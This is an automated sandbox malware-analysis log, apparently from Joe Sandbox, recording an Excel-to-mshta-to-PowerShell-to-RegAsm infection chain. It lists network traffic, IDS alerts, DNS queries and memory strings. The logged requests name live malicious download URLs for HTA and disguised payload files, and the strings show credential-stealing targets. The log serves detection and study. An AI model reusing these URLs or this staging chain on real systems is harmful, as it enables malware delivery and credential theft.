                    Source: Joe Sandbox ViewASN Name: AVAYAUS AVAYAUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49178 -> 178.237.33.50:80
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.20If-Range: "1d4f7-623a08a0dc3cf"
                    Source: global trafficHTTP traffic detected: GET /97/picturewithgreatdayseverythinggood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 04 Oct 2024 06:11:18 GMTConnection: Keep-AliveHost: 192.3.220.20If-None-Match: "1d4f7-623a08a0dc3cf"
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49170 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49180 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.20
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899D7018 URLDownloadToFileW,7_2_000007FE899D7018
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\518B3A84.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /noDe HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stylite.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.20If-Range: "1d4f7-623a08a0dc3cf"
                    Source: global trafficHTTP traffic detected: GET /97/picturewithgreatdayseverythinggood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /97/RFGBVV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /97/ug/Newprojectupdatedwithmegreat.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Fri, 04 Oct 2024 06:11:18 GMTConnection: Keep-AliveHost: 192.3.220.20If-None-Match: "1d4f7-623a08a0dc3cf"
                    Source: global trafficHTTP traffic detected: GET /97/RFGBVV.txt HTTP/1.1Host: 192.3.220.20Connection: Keep-Alive
                    Source: bhvED5C.tmp.20.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 00000016.00000002.461430134.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: stylite.io
                    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: idabo.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000E.00000002.448752677.0000000002744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20
                    Source: mshta.exe, 00000003.00000003.414481683.0000000003931000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466857716.0000000003634000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461589280.0000000003632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/
                    Source: powershell.exe, 0000000E.00000002.448752677.0000000002744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.488158083.0000000002798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/RFGBVV.txt
                    Source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/picturewi
                    Source: powershell.exe, 00000019.00000002.473447172.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.485749498.000000001A612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF
                    Source: powershell.exe, 00000019.00000002.485749498.000000001A612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIF6
                    Source: powershell.exe, 00000007.00000002.440709820.000000001A8F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFl
                    Source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/picturewithgreatdayseverythinggood.tIFp
                    Source: mshta.exe, 0000000F.00000003.464200564.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta
                    Source: mshta.exe, 00000003.00000002.417313522.0000000000599000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta0
                    Source: mshta.exe, 0000000F.00000003.465037707.000000000357D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464321262.000000000357C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464200564.000000000357C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.hta5
                    Source: mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaC
                    Source: mshta.exe, 00000003.00000002.417451118.00000000038C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462003839.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463988623.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465120785.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465383861.0000000000436000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465313984.00000000003FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htaC:
                    Source: mshta.exe, 00000003.00000003.415474990.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.415035501.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.463082163.0000000003155000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461490231.0000000003155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.20/97/ug/Newprojectupdatedwithmegreat.htahttp://192.3.220.20/97/ug/Newprojectupdate
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C514000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001C9D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.470841965.000000001A788000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD0F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C181000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.440709820.000000001A8B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.470841965.000000001A7BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495129914.000000001AD80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.441247952.000000001CA42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.471480072.000000001C4F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.466466940.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461593714.00000000035A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.462029924.00000000035C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C1B3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.495714631.000000001C197000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: mshta.exe, 00000003.00000003.414481683.00000000038E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417458456.00000000038E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.usertru
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: RegAsm.exe, 00000010.00000002.848958157.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpw
                    Source: powershell.exe, 00000007.00000002.441247952.000000001CB13000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.487987684.000000001C4F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
                    Source: powershell.exe, 00000007.00000002.433523996.0000000003C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.473447172.0000000002717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhvED5C.tmp.20.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
